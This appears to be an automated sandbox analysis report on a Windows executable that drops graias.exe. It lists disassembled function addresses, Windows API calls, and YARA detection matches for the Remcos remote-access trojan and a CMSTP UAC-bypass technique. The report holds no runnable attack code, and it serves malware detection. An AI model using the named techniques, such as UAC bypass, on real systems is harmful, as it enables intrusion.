                Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,38_2_0040DD85
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00401806 NtdllDefWindowProc_W,38_2_00401806
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004018C0 NtdllDefWindowProc_W,38_2_004018C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004016FD NtdllDefWindowProc_A,39_2_004016FD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004017B7 NtdllDefWindowProc_A,39_2_004017B7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00402CAC NtdllDefWindowProc_A,41_2_00402CAC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00402D66 NtdllDefWindowProc_A,41_2_00402D66
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004158B9
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_01325E6C0_2_01325E6C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_01327AA80_2_01327AA8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_055287280_2_05528728
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_055287180_2_05528718
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_0797E7600_2_0797E760
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_079766BC0_2_079766BC
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_079733F00_2_079733F0
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_07974FB00_2_07974FB0
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_0797E7520_2_0797E752
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_0797A1E80_2_0797A1E8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_07991F1C0_2_07991F1C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_079929C00_2_079929C0
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004520E25_2_004520E2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041D0815_2_0041D081
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043D0A85_2_0043D0A8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004371605_2_00437160
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004361BA5_2_004361BA
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004262645_2_00426264
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004313875_2_00431387
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043652C5_2_0043652C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041E5EF5_2_0041E5EF
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0044C7495_2_0044C749
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004367D65_2_004367D6
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004267DB5_2_004267DB
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043C9ED5_2_0043C9ED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00432A595_2_00432A59
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00436A9D5_2_00436A9D
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043CC1C5_2_0043CC1C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00436D585_2_00436D58
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00434D325_2_00434D32
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043CE4B5_2_0043CE4B
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00440E305_2_00440E30
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00426E835_2_00426E83
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00412F455_2_00412F45
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00452F105_2_00452F10
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00426FBD5_2_00426FBD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_00EB5E6C6_2_00EB5E6C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_00EB7AA86_2_00EB7AA8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_029187286_2_02918728
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_029186C56_2_029186C5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D066BC6_2_06D066BC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D0E7606_2_06D0E760
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D033F06_2_06D033F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D04FB06_2_06D04FB0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D0E7526_2_06D0E752
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D0A1E86_2_06D0A1E8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D21F1C6_2_06D21F1C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D229C06_2_06D229C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D21F106_2_06D21F10
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E087196_2_06E08719
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E03FC16_2_06E03FC1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E03FD06_2_06E03FD0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E003BB6_2_06E003BB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E03B986_2_06E03B98
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E037606_2_06E03760
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E057686_2_06E05768
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E057586_2_06E05758
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E033286_2_06E03328
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E078206_2_06E07820
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E0B1C86_2_06E0B1C8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_100171948_2_10017194
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_1000B5C18_2_1000B5C1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044B04038_2_0044B040
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0043610D38_2_0043610D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044731038_2_00447310
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044A49038_2_0044A490
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040755A38_2_0040755A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0043C56038_2_0043C560
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044B61038_2_0044B610
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044D6C038_2_0044D6C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004476F038_2_004476F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044B87038_2_0044B870
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044081D38_2_0044081D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0041495738_2_00414957
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004079EE38_2_004079EE
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00407AEB38_2_00407AEB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044AA8038_2_0044AA80
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00412AA938_2_00412AA9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404B7438_2_00404B74
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404B0338_2_00404B03
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044BBD838_2_0044BBD8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404BE538_2_00404BE5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00404C7638_2_00404C76
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00415CFE38_2_00415CFE
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00416D7238_2_00416D72
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00446D3038_2_00446D30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00446D8B38_2_00446D8B
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00406E8F38_2_00406E8F
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0040503839_2_00405038
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0041208C39_2_0041208C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004050A939_2_004050A9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0040511A39_2_0040511A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0043C13A39_2_0043C13A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004051AB39_2_004051AB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044930039_2_00449300
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0040D32239_2_0040D322
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044A4F039_2_0044A4F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0043A5AB39_2_0043A5AB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0041363139_2_00413631
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044669039_2_00446690
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044A73039_2_0044A730
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004398D839_2_004398D8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_004498E039_2_004498E0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044A88639_2_0044A886
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0043DA0939_2_0043DA09
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00438D5E39_2_00438D5E
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00449ED039_2_00449ED0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0041FE8339_2_0041FE83
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00430F5439_2_00430F54
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004050C241_2_004050C2
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004014AB41_2_004014AB
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040513341_2_00405133
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004051A441_2_004051A4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040124641_2_00401246
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040CA4641_2_0040CA46
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040523541_2_00405235
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004032C841_2_004032C8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_0040168941_2_00401689
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00402F6041_2_00402F60
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 004020E7 appears 39 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: String function: 00433FC0 appears 55 times
                Source: iGhDjzEiDU.exeBinary or memory string: OriginalFilename vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1681031697.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000000.1643420254.0000000000C60000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEPoD.exe2 vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1715778624.0000000009470000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1712515053.0000000007873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1714219089.0000000007940000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003194000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exe, 00000005.00000002.1683664559.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs iGhDjzEiDU.exe
                Source: iGhDjzEiDU.exeBinary or memory string: OriginalFilenameEPoD.exe2 vs iGhDjzEiDU.exe
                Source: unknownDriver loaded: C:\Windows\System32\drivers\mstee.sys
                Source: iGhDjzEiDU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: iGhDjzEiDU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: graias.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, oirEpTQk4AEyLHDkvV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.SetAccessControl
